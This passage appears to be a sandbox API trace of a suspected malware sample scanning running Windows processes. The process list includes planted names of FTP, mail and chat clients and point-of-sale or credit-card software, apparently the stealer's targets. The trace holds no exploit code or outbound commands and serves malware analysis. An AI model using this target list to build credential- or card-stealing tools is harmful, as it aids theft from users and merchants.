th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0212.954] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0212.956] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0212.957] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0212.959] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0212.961] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0212.963] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0212.968] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0212.970] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0212.972] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0212.974] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0212.976] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0212.978] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0212.983] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0212.986] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0212.988] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0212.990] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0212.992] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0213.000] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0213.002] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0213.004] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0213.007] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0213.009] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0213.011] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0213.016] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0213.019] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0213.021] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0213.024] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0213.030] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0213.032] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0213.034] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0213.036] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0213.038] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0213.041] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0213.063] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0213.065] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0213.067] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0213.069] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0213.072] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0213.077] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0213.079] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0213.081] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0213.083] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0213.085] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0213.087] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0213.092] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0213.094] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0213.096] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0213.098] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0213.100] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0213.102] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0213.153] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0213.204] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.205] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.206] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.208] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0213.209] CloseHandle (hObject=0xde8) returned 1 [0213.209] Sleep (dwMilliseconds=0x64) [0213.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0213.352] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.354] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.356] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.358] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.360] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.362] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.364] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.366] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.368] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.370] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.372] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.373] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.375] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.380] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.382] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.384] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.386] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.388] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.390] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.392] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.393] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0213.395] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0213.397] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.400] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.402] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0213.404] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0213.406] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0213.408] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0213.410] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 